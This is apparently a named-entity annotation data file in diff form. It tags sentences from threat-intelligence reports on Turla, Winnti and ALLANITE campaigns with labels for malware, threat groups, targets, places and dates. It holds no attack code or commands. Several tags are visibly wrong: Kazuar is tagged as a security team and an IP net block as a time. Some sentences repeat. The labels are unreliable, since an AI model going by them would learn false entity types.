+target O
+. O
+
+Finally O
+, O
+there O
+are O
+many O
+similarities O
+between O
+Gazer S-MAL
+and O
+other O
+second O
+stage O
+backdoors S-MAL
+used O
+by O
+the O
+Turla S-APT
+group O
+such O
+as O
+Carbon S-APT
+and O
+Kazuar S-APT
+. O
+
+Skipper S-MAL
+, O
+which O
+has O
+been O
+linked O
+to O
+Turla S-APT
+in O
+the O
+past O
+, O
+was O
+found O
+alongside O
+Gazer S-MAL
+in O
+most O
+cases O
+we O
+investigated O
+. O
+
+Turla B-APT
+APT I-APT
+group E-APT
+makes O
+an O
+extra O
+effort O
+to O
+avoid O
+detection O
+by O
+wiping O
+files O
+securely O
+, O
+changing O
+the O
+strings O
+and O
+randomizing O
+what O
+could O
+be O
+simple O
+markers O
+through O
+the O
+different O
+backdoor O
+versions O
+. O
+
+The O
+attackers O
+behind O
+Epic B-MAL
+Turla E-MAL
+have O
+infected O
+several O
+hundred O
+computers O
+in O
+more O
+than O
+45 O
+countries O
+, O
+including O
+government B-IDTY
+institutions E-IDTY
+. O
+
+Turla S-APT
+all O
+uses O
+an O
+encrypted B-MAL
+container E-MAL
+to O
+store O
+the O
+malware O
+'s O
+components O
+and O
+configuration O
+and O
+they O
+also O
+log O
+their O
+actions O
+in O
+a O
+file O
+. O
+
+Over O
+the O
+last O
+10 O
+months O
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+researchers O
+have O
+analyzed O
+a O
+massive O
+cyber-espionage O
+operation O
+which O
+we O
+call O
+" O
+Epic B-MAL
+Turla E-MAL
+" O
+. O
+
+We O
+also O
+observed O
+exploits O
+against O
+older O
+( O
+patched O
+) O
+vulnerabilities O
+, O
+social B-IDTY
+engineering E-IDTY
+techniques O
+and O
+watering B-ACT
+hole E-ACT
+strategies O
+in O
+these O
+attacks O
+. O
+
+The O
+attackers O
+behind O
+Epic B-MAL
+Turla E-MAL
+have O
+infected O
+several O
+hundred O
+computers O
+in O
+more O
+than O
+45 O
+countries O
+, O
+including O
+embassies S-IDTY
+. O
+
+The O
+attackers O
+behind O
+Epic B-MAL
+Turla E-MAL
+have O
+infected O
+several O
+hundred O
+computers O
+in O
+more O
+than O
+45 O
+countries O
+, O
+including O
+military S-IDTY
+. O
+
+The O
+attackers O
+behind O
+Epic B-MAL
+Turla E-MAL
+have O
+infected O
+several O
+hundred O
+computers O
+in O
+more O
+than O
+45 O
+countries O
+, O
+including O
+education S-IDTY
+. O
+
+When O
+G-Data S-SECTEAM
+published O
+on O
+Turla/Uroburos S-APT
+back O
+in O
+February O
+, O
+several O
+questions O
+remained O
+unanswered O
+. O
+
+The O
+attackers O
+behind O
+Epic B-MAL
+Turla E-MAL
+have O
+infected O
+several O
+hundred O
+computers O
+in O
+more O
+than O
+45 O
+countries O
+, O
+including O
+research O
+and O
+pharmaceutical B-IDTY
+companies E-IDTY
+. O
+
+The O
+primary O
+backdoor O
+used O
+in O
+the O
+Epic B-ACT
+attacks E-ACT
+is O
+also O
+known O
+as O
+" O
+WorldCupSec S-APT
+" O
+, O
+" O
+TadjMakhal S-APT
+" O
+, O
+" O
+Wipbot S-APT
+" O
+or O
+" O
+Tavdig S-APT
+" O
+. O
+
+Thrip O
+'s O
+motive O
+is O
+likely O
+espionage O
+and O
+its O
+targets O
+include O
+those O
+in O
+the O
+communications S-IDTY
+, O
+geospatial B-IDTY
+imaging E-IDTY
+, O
+and O
+defense B-IDTY
+sectors E-IDTY
+, O
+both O
+in O
+the O
+United B-LOC
+States E-LOC
+and O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+One O
+big O
+unknown O
+was O
+the O
+infection O
+vector O
+for O
+Turla S-APT
+( O
+aka O
+Snake S-APT
+or O
+Uroburos S-APT
+) O
+. O
+
+The O
+mothership O
+server O
+is O
+generally O
+a O
+VPS S-TOOL
+, O
+which O
+runs O
+the O
+Control O
+panel O
+software O
+used O
+to O
+interact O
+with O
+the O
+victims O
+. O
+
+the O
+backdoor O
+is O
+packaged O
+together O
+with O
+the O
+CVE-2013-5065 S-VULID
+EoP S-TOOL
+exploit S-VULNAME
+and O
+heavily O
+obfuscated O
+. O
+
+Once O
+a O
+victim O
+is O
+confirmed O
+as O
+" O
+interesting O
+" O
+, O
+the O
+attackers O
+upload O
+another O
+Epic B-MAL
+backdoor E-MAL
+which O
+has O
+a O
+unique O
+ID O
+used O
+to O
+control O
+this O
+specific O
+victim O
+. O
+
+Our O
+analysis O
+indicates O
+this O
+is O
+a O
+sophisticated O
+multi-stage O
+infection O
+; O
+which O
+begins O
+with O
+Epic B-MAL
+Turla E-MAL
+. O
+
+this O
+attack O
+against O
+a O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+user O
+on O
+August B-TIME
+5 E-TIME
+, O
+2014 S-TIME
+. O
+
+VENOMOUS B-APT
+BEAR E-APT
+is O
+an O
+advanced O
+, O
+Russia-based S-LOC
+adversary O
+that's O
+been O
+active O
+since O
+at O
+least O
+2004 S-TIME
+. O
+
+Venomous B-APT
+Bear E-APT
+has O
+deployed O
+malware O
+to O
+targets O
+using O
+several O
+novel B-ACT
+methods E-ACT
+. O
+
+For O
+years O
+, O
+Turla S-APT
+has O
+relied O
+, O
+among O
+other O
+impersonations O
+, O
+on O
+fake B-MAL
+Flash I-MAL
+installers E-MAL
+to O
+compromise O
+victims O
+. O
+
+Turla S-APT
+merely O
+uses O
+the O
+Adobe O
+brand O
+to O
+trick O
+users O
+into O
+downloading O
+the O
+malware O
+. O
+
+By O
+looking O
+at O
+our O
+telemetry O
+, O
+we O
+found O
+evidence O
+that O
+Turla S-APT
+installers O
+were O
+exfiltrating O
+information O
+to O
+get.adobe.com O
+URLs O
+since O
+at O
+least O
+July B-TIME
+2016 E-TIME
+. O
+
+Thus O
+, O
+it O
+is O
+clear O
+they O
+are O
+trying O
+to O
+be O
+as O
+stealthy O
+as O
+possible O
+by O
+hiding O
+in O
+the O
+network B-ACT
+traffic E-ACT
+of O
+the O
+targeted O
+organizations O
+. O
+
+Finally O
+, O
+some O
+of O
+the O
+victims O
+are O
+also O
+infected O
+with O
+other O
+Turla-related S-APT
+malware S-MAL
+such O
+as O
+ComRAT S-MAL
+or O
+Gazer S-MAL
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+documented O
+this O
+behavior O
+in O
+2014 S-TIME
+. O
+
+It O
+is O
+not O
+a O
+new O
+tactic O
+for O
+Turla S-APT
+to O
+rely O
+on O
+fake B-MAL
+Flash I-MAL
+installers E-MAL
+to O
+try O
+to O
+trick O
+the O
+user O
+to O
+install O
+one O
+of O
+their O
+backdoors O
+. O
+
+Turla S-APT
+operators O
+could O
+use O
+an O
+already-compromised O
+machine O
+in O
+the O
+network O
+of O
+the O
+victim O
+'s O
+organization O
+to O
+perform O
+a O
+local O
+MitM B-ACT
+attack E-ACT
+. O
+
+Our O
+January B-TIME
+2018 E-TIME
+white O
+paper O
+was O
+the O
+first O
+public O
+analysis O
+of O
+a O
+Turla B-ACT
+campaign E-ACT
+called O
+Mosquito S-ACT
+. O
+
+It O
+is O
+not O
+the O
+first O
+time O
+Turla S-APT
+has O
+used O
+generic B-MAL
+tools E-MAL
+. O
+
+In O
+the O
+past O
+, O
+we O
+have O
+seen O
+the O
+group O
+using O
+open-source B-MAL
+password I-MAL
+dumpers E-MAL
+such O
+as O
+Mimikatz S-MAL
+. O
+
+Starting O
+in O
+March B-TIME
+2018 E-TIME
+, O
+we O
+observed O
+a O
+significant O
+change O
+in O
+the O
+campaign O
+: O
+it O
+now O
+leverages O
+the O
+open O
+source O
+exploitation O
+framework O
+Metasploit S-MAL
+before O
+dropping O
+the O
+custom O
+Mosquito O
+backdoor O
+. O
+
+Even O
+an O
+experienced O
+user O
+can O
+be O
+fooled O
+by O
+downloading O
+a O
+malicious B-FILE
+file E-FILE
+that O
+is O
+apparently O
+from O
+adobe.com S-ACT
+, O
+since O
+the O
+URL O
+and O
+the O
+IP S-PROT
+address O
+correspond O
+to O
+Adobe O
+'s O
+legitimate O
+infrastructure O
+. O
+
+However O
+, O
+to O
+our O
+knowledge O
+, O
+this O
+is O
+the O
+first O
+time O
+Turla S-APT
+has O
+used O
+Metasploit S-MAL
+as O
+a O
+first O
+stage O
+backdoor O
+, O
+instead O
+of O
+relying O
+on O
+one O
+of O
+its O
+own O
+tools O
+such O
+as O
+Skipper S-MAL
+. O
+
+Traffic O
+was O
+intercepted O
+on O
+a O
+node O
+between O
+the O
+end O
+machine O
+and O
+the O
+Adobe O
+servers O
+, O
+allowing O
+Turla S-APT
+'s O
+operators O
+to O
+replace B-ACT
+the I-ACT
+legitimate I-ACT
+Flash I-ACT
+executable E-ACT
+with O
+a O
+trojanized O
+version O
+. O
+
+At O
+the O
+beginning O
+of O
+March B-TIME
+2018 E-TIME
+, O
+as O
+part O
+of O
+our O
+regular O
+tracking O
+of O
+Turla S-APT
+'s O
+activities S-ACT
+, O
+we O
+observed O
+some O
+changes O
+in O
+the O
+Mosquito B-ACT
+campaign E-ACT
+. O
+
+In O
+this O
+post O
+, O
+we O
+have O
+presented O
+the O
+evolutions O
+of O
+the O
+Turla B-ACT
+Mosquito I-ACT
+campaign E-ACT
+over O
+the O
+last O
+few O
+months O
+. O
+
+Primary O
+targets O
+for O
+this O
+adversary O
+are O
+in O
+the O
+government S-IDTY
+, O
+aerospace S-IDTY
+, O
+NGO S-IDTY
+, O
+defense S-IDTY
+, O
+cryptology S-IDTY
+and O
+education B-IDTY
+sectors E-IDTY
+. O
+
+Turla S-APT
+'s O
+campaign O
+still O
+relies O
+on O
+a O
+fake O
+Flash S-TOOL
+installer O
+but O
+, O
+instead O
+of O
+directly O
+dropping O
+the O
+two O
+malicious O
+DLLs O
+, O
+it O
+executes O
+a O
+Metasploit B-MAL
+shellcode I-MAL
+and I-MAL
+drops E-MAL
+, O
+or O
+downloads O
+from O
+Google O
+Drive O
+, O
+a O
+legitimate O
+Flash S-TOOL
+installer O
+. O
+
+The O
+Turla S-APT
+espionage O
+group O
+has O
+been O
+targeting O
+various O
+institutions O
+for O
+many O
+years O
+. O
+
+Recently O
+, O
+we O
+found O
+several O
+new O
+versions O
+of O
+Carbon S-MAL
+, O
+a O
+second O
+stage O
+backdoor O
+in O
+the O
+Turla S-APT
+group O
+arsenal O
+. O
+
+The O
+Turla S-APT
+group O
+is O
+known O
+to O
+be O
+painstaking O
+and O
+work O
+in O
+stages O
+, O
+first O
+doing O
+reconnaissance O
+on O
+their O
+victims' O
+systems O
+before O
+deploying O
+their O
+most O
+sophisticated O
+tools O
+such O
+as O
+Carbon S-MAL
+. O
+
+Kaspersky B-SECTEAM
+APT I-SECTEAM
+Intelligence I-SECTEAM
+Reporting I-SECTEAM
+subscription E-SECTEAM
+, O
+customers O
+received O
+an O
+update O
+in O
+mid-February S-TIME
+2017 S-TIME
+. O
+
+Like O
+previous O
+Turla B-ACT
+activity E-ACT
+, O
+WhiteBear S-MAL
+leverages O
+compromised B-ACT
+websites E-ACT
+and O
+hijacked O
+satellite O
+connections O
+for O
+command O
+and O
+control O
+( O
+C2 S-TOOL
+) O
+infrastructure O
+. O
+
+WhiteBear S-MAL
+is O
+a O
+parallel O
+project O
+or O
+second O
+stage O
+of O
+the O
+Skipper B-MAL
+Turla E-MAL
+cluster O
+of O
+activity O
+documented O
+in O
+another O
+private O
+intelligence O
+report O
+" O
+Skipper B-MAL
+Turla E-MAL
+– O
+the O
+White B-MAL
+Atlas E-MAL
+framework O
+" O
+from O
+mid-2016 S-TIME
+. O
+
+However O
+, O
+despite O
+the O
+similarities O
+to O
+previous O
+Turla B-ACT
+campaigns E-ACT
+, O
+we O
+believe O
+that O
+WhiteBear S-MAL
+is O
+a O
+distinct O
+project O
+with O
+a O
+separate O
+focus O
+. O
+
+From O
+February S-TIME
+to O
+September B-TIME
+2016 E-TIME
+, O
+WhiteBear B-ACT
+activity E-ACT
+was O
+narrowly O
+focused O
+on O
+embassies S-IDTY
+and O
+consular O
+operations O
+around O
+the O
+world O
+. O
+
+Continued O
+WhiteBear B-ACT
+activity E-ACT
+later O
+shifted O
+to O
+include O
+defense-related B-IDTY
+organizations E-IDTY
+into O
+June B-TIME
+2017 E-TIME
+. O
+
+All O
+of O
+these O
+early O
+WhiteBear S-MAL
+targets O
+were O
+related O
+to O
+embassies S-IDTY
+and O
+diplomatic/foreign O
+affair O
+organizations O
+. O
+
+Thus O
+, O
+Turla S-APT
+operators O
+had O
+access O
+to O
+some O
+highly O
+sensitive O
+information O
+( O
+such O
+as O
+emails S-TOOL
+sent O
+by O
+the O
+German B-IDTY
+Foreign I-IDTY
+Office I-IDTY
+staff E-IDTY
+) O
+for O
+almost O
+a O
+year O
+. O
+
+Our O
+investigation O
+also O
+led O
+to O
+the O
+discovery O
+of O
+dozens O
+of O
+email S-TOOL
+addresses O
+registered O
+by O
+Turla S-APT
+operators O
+for O
+this O
+campaign O
+and O
+used O
+to O
+receive O
+exfiltrated O
+data O
+from O
+the O
+victims O
+. O
+
+It O
+mainly O
+targets O
+Microsoft S-IDTY
+Outlook S-TOOL
+, O
+a O
+widely O
+used O
+mail O
+client O
+, O
+but O
+also O
+targets O
+The O
+Bat! O
+, O
+a O
+mail O
+client O
+very O
+popular O
+in O
+Eastern O
+Europe O
+. O
+
+First O
+, O
+Turla S-APT
+steals O
+emails S-TOOL
+by O
+forwarding O
+all O
+outgoing O
+emails S-TOOL
+to O
+the O
+attackers O
+. O
+
+We O
+identified O
+several O
+European B-IDTY
+governments E-IDTY
+and O
+defense B-IDTY
+companies E-IDTY
+compromised O
+with O
+this O
+group O
+. O
+
+What O
+actually O
+happens O
+is O
+that O
+the O
+malware O
+is O
+able O
+to O
+decode O
+data O
+from O
+the O
+PDF B-MAL
+documents E-MAL
+and O
+interpret O
+it O
+as O
+commands O
+for O
+the O
+backdoor O
+. O
+
+In O
+early O
+2018 S-TIME
+, O
+multiple O
+media S-IDTY
+claimed O
+that O
+Turla S-APT
+operators O
+used O
+mail B-ACT
+attachments E-ACT
+to O
+control O
+infected O
+machines O
+. O
+
+As O
+detailed O
+in O
+the O
+previous O
+section O
+, O
+this O
+malware O
+is O
+able O
+to O
+manipulate O
+and O
+exfiltrate O
+emails S-TOOL
+. O
+
+To O
+our O
+knowledge O
+, O
+Turla S-APT
+is O
+the O
+only O
+espionage O
+group O
+that O
+currently O
+uses O
+a O
+backdoor O
+entirely O
+controlled O
+by O
+emails S-TOOL
+, O
+and O
+more O
+specifically O
+via O
+PDF B-MAL
+attachments E-MAL
+. O
+
+The O
+attackers O
+first O
+infected O
+in O
+March B-TIME
+2017 E-TIME
+. O
+
+Our O
+research O
+shows O
+that O
+compromised O
+organizations O
+are O
+at O
+risk O
+of O
+not O
+only O
+being O
+spied O
+on O
+by O
+the O
+Turla S-APT
+group O
+who O
+planted O
+the O
+backdoor O
+, O
+but O
+also O
+by O
+other O
+attackers O
+. O
+
+The O
+developers O
+refer O
+to O
+this O
+tool O
+by O
+the O
+name O
+Kazuar S-MAL
+, O
+which O
+is O
+a O
+Trojan S-MAL
+written O
+using O
+the O
+Microsoft.NET O
+Framework O
+that O
+offers O
+actors O
+complete O
+access O
+to O
+compromised O
+systems O
+targeted O
+by O
+its O
+operator O
+. O
+
+We O
+suspect O
+the O
+Kazuar B-MAL
+tool E-MAL
+may O
+be O
+linked O
+to O
+the O
+Turla S-APT
+threat O
+actor O
+group O
+( O
+also O
+known O
+as O
+Uroburos S-APT
+and O
+Snake S-APT
+) O
+, O
+who O
+have O
+been O
+reported O
+to O
+have O
+compromised O
+embassies S-IDTY
+, O
+defense B-IDTY
+contractors E-IDTY
+, O
+educational B-IDTY
+institutions E-IDTY
+, O
+and O
+research B-IDTY
+organizations E-IDTY
+across O
+the O
+globe O
+. O
+
+This O
+is O
+also O
+a O
+full-featured B-MAL
+backdoor E-MAL
+controlled O
+by O
+email S-ACT
+, O
+and O
+which O
+can O
+work O
+independently O
+of O
+any O
+other O
+Turla S-APT
+component O
+. O
+
+A O
+hallmark O
+of O
+Turla S-APT
+operations O
+is O
+iterations O
+of O
+their O
+tools O
+and O
+code B-ACT
+lineage E-ACT
+in O
+Kazuar S-MAL
+can O
+be O
+traced O
+back O
+to O
+at O
+least O
+2005 S-TIME
+. O
+
+If O
+the O
+hypothesis O
+is O
+correct O
+and O
+the O
+Turla S-APT
+threat O
+group O
+is O
+using O
+Kazuar S-MAL
+, O
+we O
+believe O
+they O
+may O
+be O
+using O
+it O
+as O
+a O
+replacement O
+for O
+Carbon S-MAL
+and O
+its O
+derivatives O
+. O
+
+We O
+used O
+a O
+combination O
+of O
+tools O
+such O
+as O
+NoFuserEx S-MAL
+, O
+ConfuserEx B-MAL
+Fixer E-MAL
+, O
+ConfuserEx B-MAL
+Switch I-MAL
+Killer E-MAL
+, O
+and O
+de4d0t S-MAL
+in O
+order O
+to O
+deobfuscate O
+the O
+code O
+for O
+in O
+depth O
+analysis O
+. O
+
+Kazuar S-SECTEAM
+generates O
+its O
+mutex O
+by O
+using O
+a O
+process O
+that O
+begins O
+with O
+obtaining O
+the O
+MD5 S-ENCR
+hash O
+of O
+a O
+string O
+" O
+[username]=>singleton-instance-mutex O
+" O
+. O
+
+The O
+subject O
+is O
+a O
+series O
+of O
+targeted B-ACT
+attacks E-ACT
+against O
+private B-IDTY
+companies E-IDTY
+. O
+
+e O
+uncovered O
+the O
+activity O
+of O
+a O
+hacking O
+group O
+which O
+has O
+Chinese O
+origins O
+. O
+
+Also O
+, O
+by O
+creating O
+this O
+type O
+of O
+API B-ACT
+access E-ACT
+, O
+Turla S-APT
+could O
+use O
+one O
+accessible O
+server O
+as O
+a O
+single O
+point O
+to O
+dump O
+data O
+to O
+and O
+exfiltrate O
+data O
+from O
+. O
+
+According O
+to O
+our O
+estimations O
+, O
+this O
+group O
+has O
+been O
+active O
+for O
+several O
+years O
+and O
+specializes O
+in O
+cyberattacks O
+against O
+the O
+online B-IDTY
+video I-IDTY
+game I-IDTY
+industry E-IDTY
+. O
+
+Based O
+on O
+our O
+analysis O
+, O
+we O
+believe O
+that O
+threat O
+actors O
+may O
+compile O
+Windows S-OS
+and O
+Unix O
+based O
+payloads O
+using O
+the O
+same O
+code O
+to O
+deploy O
+Kazuar S-SECTEAM
+against O
+both O
+platforms O
+. O
+
+The O
+group O
+'s O
+main O
+objective O
+is O
+to O
+steal O
+source O
+codes O
+. O
+
+In O
+2010 S-TIME
+HBGary S-SECTEAM
+investigated O
+an O
+information O
+security O
+incident O
+related O
+to O
+the O
+Winnti S-MAL
+group O
+at O
+one O
+of O
+HBGary S-SECTEAM
+'s O
+customers O
+– O
+an O
+American B-IDTY
+video I-IDTY
+game I-IDTY
+company E-IDTY
+. O
+
+In O
+2010 S-TIME
+US-based S-LOC
+HBGary S-SECTEAM
+investigated O
+an O
+information O
+security O
+incident O
+related O
+to O
+the O
+Winnti S-MAL
+group O
+at O
+one O
+of O
+HBGary S-SECTEAM
+'s O
+customers O
+– O
+an O
+American S-LOC
+video B-IDTY
+game I-IDTY
+company E-IDTY
+. O
+
+For O
+a O
+long O
+time O
+the O
+Winnti B-APT
+group E-APT
+had O
+been O
+considered O
+as O
+a O
+Chinese B-LOC
+threat I-LOC
+actor E-LOC
+targeting O
+gaming B-IDTY
+companies E-IDTY
+specifically O
+. O
+
+In O
+April S-TIME
+Novetta S-SECTEAM
+released O
+its O
+excellent O
+report O
+on O
+the O
+Winnti S-MAL
+malware S-MAL
+spotted O
+in O
+the O
+operations O
+of O
+Axiom O
+group O
+. O
+
+The O
+Axiom S-APT
+group O
+has O
+been O
+presented O
+as O
+an O
+advanced O
+Chinese B-LOC
+threat I-LOC
+actor E-LOC
+carrying O
+out O
+cyber-espionage B-ACT
+attacks E-ACT
+against O
+a O
+whole O
+range O
+of O
+different O
+industries O
+. O
+
+this O
+library O
+includes O
+two O
+drivers O
+compiled O
+on O
+August B-TIME
+22 E-TIME
+and O
+September B-TIME
+4 E-TIME
+, O
+2014 S-TIME
+. O
+
+Also O
+our O
+visibility O
+as O
+a O
+vendor O
+does O
+not O
+cover O
+every O
+company O
+in O
+the O
+world O
+( O
+at O
+least O
+so O
+far O
+; O
+) O
+) O
+and O
+the O
+Kaspersky B-SECTEAM
+Security I-SECTEAM
+Network E-SECTEAM
+( O
+KSN S-SECTEAM
+) O
+did O
+not O
+reveal O
+other O
+attacks O
+except O
+those O
+against O
+gaming B-IDTY
+companies E-IDTY
+. O
+
+Conversely O
+, O
+LokiBot S-MAL
+and O
+Agent B-MAL
+Tesla E-MAL
+are O
+new O
+malware O
+tools O
+. O
+
+Based O
+on O
+multiple O
+active O
+compromises O
+by O
+the O
+Axiom O
+threat O
+group O
+, O
+Novetta S-SECTEAM
+was O
+able O
+to O
+capture O
+and O
+analyze O
+new O
+Winnti B-MAL
+malware I-MAL
+samples E-MAL
+. O
+
+Initial O
+attack O
+targets O
+are O
+commonly O
+software O
+and O
+gaming B-IDTY
+organizations E-IDTY
+in O
+United B-LOC
+States E-LOC
+, O
+Japan S-LOC
+, O
+South B-LOC
+Korea E-LOC
+, O
+and O
+China S-LOC
+. O
+
+Initial O
+attack O
+targets O
+are O
+commonly O
+software O
+and O
+gaming B-IDTY
+organizations E-IDTY
+in O
+United B-LOC
+States E-LOC
+, O
+Japan S-LOC
+, O
+South B-LOC
+Korea E-LOC
+, O
+and O
+China S-LOC
+. O
+
+The O
+samples O
+Novetta S-SECTEAM
+obtained O
+from O
+the O
+active O
+Axiom O
+infection O
+were O
+compiled O
+in O
+mid- O
+to O
+late O
+2014 S-TIME
+and O
+represent O
+what O
+Novetta S-SECTEAM
+is O
+referring O
+to O
+as O
+version O
+3.0 O
+of O
+the O
+Winnti S-APT
+lineage O
+. O
+
+We O
+assess O
+with O
+high O
+confidence O
+that O
+the O
+Winnti S-MAL
+umbrella O
+is O
+associated O
+with O
+the O
+Chinese B-LOC
+state I-LOC
+intelligence E-LOC
+apparatus O
+, O
+with O
+at O
+least O
+some O
+elements O
+located O
+in O
+the O
+Xicheng B-LOC
+District I-LOC
+of I-LOC
+Beijing E-LOC
+. O
+
+The O
+Winnti S-MAL
+umbrella O
+continues O
+to O
+operate O
+highly O
+successfully O
+in O
+2018 S-TIME
+. O
+
+The O
+Winnti S-MAL
+umbrella O
+and O
+closely O
+associated O
+entities O
+has O
+been O
+active O
+since O
+at O
+least O
+2009 S-TIME
+. O
+
+The O
+Winnti S-APT
+and O
+Axiom O
+group O
+names O
+were O
+created O
+by O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+and O
+Symantec S-SECTEAM
+, O
+respectively O
+, O
+for O
+their O
+2013/2014 S-TIME
+reports O
+on O
+the O
+original O
+group O
+. O
+
+Their O
+operations O
+against O
+gaming S-IDTY
+and O
+technology B-IDTY
+organizations E-IDTY
+are O
+believed O
+to O
+be O
+economically O
+motivated O
+in O
+nature O
+. O
+
+However O
+, O
+based O
+on O
+the O
+findings O
+shared O
+in O
+this O
+report O
+we O
+assess O
+with O
+high O
+confidence O
+that O
+the O
+actor O
+'s O
+primary O
+long-term O
+mission O
+is O
+politically O
+focused O
+. O
+
+The O
+Winnti S-MAL
+umbrella O
+and O
+linked O
+groups' O
+initial O
+targets O
+are O
+gaming B-IDTY
+studios E-IDTY
+and O
+high B-IDTY
+tech I-IDTY
+businesses E-IDTY
+. O
+
+During O
+the O
+same O
+time O
+period O
+, O
+we O
+also O
+observed O
+the O
+actor O
+using O
+the O
+Browser O
+Exploitation O
+Framework O
+( O
+BeEF O
+) O
+to O
+compromise O
+victim O
+hosts O
+and O
+download O
+Cobalt B-MAL
+Strike E-MAL
+. O
+
+In O
+this O
+campaign O
+, O
+the O
+attackers O
+experimented O
+with O
+publicly B-MAL
+available I-MAL
+tooling E-MAL
+for O
+attack B-ACT
+operations E-ACT
+. O
+
+The O
+primary O
+goal O
+of O
+these O
+attacks O
+was O
+likely O
+to O
+find O
+code-signing O
+certificates O
+for O
+signing O
+future O
+malware O
+. O
+
+The O
+Chinese B-LOC
+intelligence I-LOC
+apparatus E-LOC
+has O
+been O
+reported O
+on O
+under O
+many O
+names O
+, O
+including O
+Winnti S-MAL
+, O
+PassCV O
+, O
+APT17 O
+, O
+Axiom O
+, O
+LEAD O
+, O
+Barium S-APT
+, O
+Wicked O
+Panda O
+, O
+and O
+GREF O
+. O
+
+The O
+attackers O
+behind O
+observed O
+activity O
+in O
+2018 S-TIME
+operate O
+from O
+the O
+Xicheng B-LOC
+District I-LOC
+of I-LOC
+Beijing E-LOC
+via O
+the O
+net O
+block O
+221.216.0.0/13 S-TIME
+. O
+
+ALLANITE B-ACT
+activity E-ACT
+closely O
+resembles O
+Palmetto O
+Fusion O
+described O
+by O
+the O
+US S-LOC
+Department B-SECTEAM
+of I-SECTEAM
+Homeland I-SECTEAM
+Security E-SECTEAM
+( O
+DHS S-SECTEAM
+) O
+. O
+
+ALLANITE B-ACT
+activity E-ACT
+closely O
+resembles O
+Palmetto O
+Fusion O
+described O
+by O
+the O
+US O
+Department B-SECTEAM
+of I-SECTEAM
+Homeland I-SECTEAM
+Security E-SECTEAM
+. O
+
+ALLANITE O
+uses O
+email B-ACT
+phishing I-ACT
+campaigns E-ACT
+and O
+compromised B-MAL
+websites E-MAL
+called O
+watering B-ACT
+holes E-ACT
+to O
+steal O
+credentials O
+and O
+gain O
+access O
+to O
+target O
+networks O
+, O
+including O
+collecting O
+and O
+distributing O
+screenshots O
+of O
+industrial O
+control O
+systems O
+. O
+
+In O
+October B-TIME
+2017 E-TIME
+, O
+a O
+DHS S-SECTEAM
+advisory O
+documented O
+ALLANITE O
+technical O
+operations O
+combined O
+with O
+activity O
+with O
+a O
+group O
+Symantec S-SECTEAM
+calls O
+Dragonfly S-APT
+( O
+which O
+Dragos S-SECTEAM
+associates O
+with O
+DYMALLOY S-MAL
+) O
+. O
+
+In O
+October B-TIME
+2017 E-TIME
+, O
+a O
+DHS S-SECTEAM
+advisory O
+documented O
+ALLANITE O
+technical O
+operations O
+combined O
+with O
+activity O
+with O
+a O
+group O
+. O
+
+We O
+assess O
+with O
+high O
+confidence O
+that O
+the O
+attackers O
+discussed O
+here O
+are O
+associated O
+with O
+the O
+Chinese O
+state O
+intelligence O
+apparatus O
+. O
+
+ALLANITE B-ACT
+operations E-ACT
+limit O
+themselves O
+to O
+information O
+gathering O
+and O
+have O
+not O
+demonstrated O
+any O
+disruptive O
+or O
+damaging O
+capabilities O
+. O
+
+In O
+October B-TIME
+2017 E-TIME
+, O
+a O
+DHS S-SECTEAM
+advisory O
+documented O
+ALLANITE O
+technical O
+operations O
+combined O
+with O
+activity O
+with O
+a O
+group O
+Symantec S-SECTEAM
+calls O
+Dragonfly S-APT
+. O
+
+Public O
+disclosure O
+by O
+third-parties O
+, O
+including O
+the O
+DHS S-SECTEAM
+, O
+associate O
+ALLANITE B-ACT
+operations E-ACT
+with O
+Russian O
+strategic O
+interests O
+. O
+
+ALLANITE O
+conducts O
+malware-less O
+operations O
+primarily O
+leveraging O
+legitimate O
+and O
+available O
+tools O
+in O
+the O
+Windows S-OS
+operating O
+system O
+. O
+
+Dragos S-SECTEAM
+does O
+not O
+publicly O
+describe O
+ICS O
+activity O
+group O
+technical O
+details O
+except O
+in O
+extraordinary O
+circumstances O
+in O
+order O
+to O
+limit O
+tradecraft O
+proliferation O
+. O
+
+However O
+, O
+full O
+details O
+on O
+ALLANITE O
+and O
+other O
+group O
+tools O
+, O
+techniques O
+, O
+procedures O
+, O
+and O
+infrastructure O
+is O
+available O
+to O
+network O
+defenders O
+via O
+Dragos B-SECTEAM
+WorldView E-SECTEAM
+. O
+
+In O
+addition O
+to O
+maritime O
+operations O
+in O
+this O
+region O
+, O
+Anchor O
+Panda O
+also O
+heavily O
+targeted O
+western O
+companies O
+in O
+the O
+US S-LOC
+, O
+Germany S-LOC
+, O
+Sweden S-LOC
+, O
+the O
+UK S-LOC
+, O
+and O
+Australia S-LOC
+, O
+and O
+other O
+countries O
+involved O
+in O
+maritime O
+satellite O
+systems O
+, O
+aerospace B-IDTY
+companies E-IDTY
+, O
+and O
+defense B-IDTY
+contractors E-IDTY
+. O
+
+A O
+current O
+round O
+of O
+cyber-attacks O
+from O
+Chinese B-LOC
+source I-LOC
+groups E-LOC
+are O
+targeting O
+the O
+maritime B-IDTY
+sector E-IDTY
+in O
+an O
+attempt O
+to O
+steal O
+technology O
+. O
+
+PLA B-LOC
+Navy E-LOC
+Anchor B-APT
+Panda E-APT
+is O
+an O
+adversary O
+that O
+CrowdStrike S-SECTEAM
+has O
+tracked O
+extensively O
+over O
+the O
+last O
+year O
+targeting O
+both O
+civilian O
+and O
+military O
+maritime O
+operations O
+in O
+the O
+green/brown O
+water O
+regions O
+primarily O
+in O
+the O
+LOC O
+of O
+operations O
+of O
+the O
+South B-LOC
+Sea I-LOC
+Fleet I-LOC
+of I-LOC
+the I-LOC
+PLA I-LOC
+Navy E-LOC
+. O
+
+ALLANITE B-ACT
+operations E-ACT
+continue O
+and O
+intelligence O
+indicates O
+activity O
+since O
+at O
+least O
+May B-TIME
+2017 E-TIME
+. O
+
+APT O
+Anchor O
+Panda O
+is O
+a O
+Chinese B-LOC
+threat I-LOC
+actor I-LOC
+group E-LOC
+who O
+target O
+maritime O
+operations O
+. O
+
+According O
+to O
+cyber O
+security O
+researchers O
+, O
+Anchor O
+Panda O
+, O
+who O
+work O
+directly O
+for O
+the O
+Chinese B-LOC
+PLA I-LOC
+Navy E-LOC
+, O
+likely O
+remains O
+active O
+. O
+
+Dragos S-SECTEAM
+does O
+not O
+corroborate O
+nor O
+conduct O
+political O
+attribution O
+to O
+threat B-ACT
+activity E-ACT
+. O
+
+In O
+the O
+past O
+they O
+used O
+Adobe B-MAL
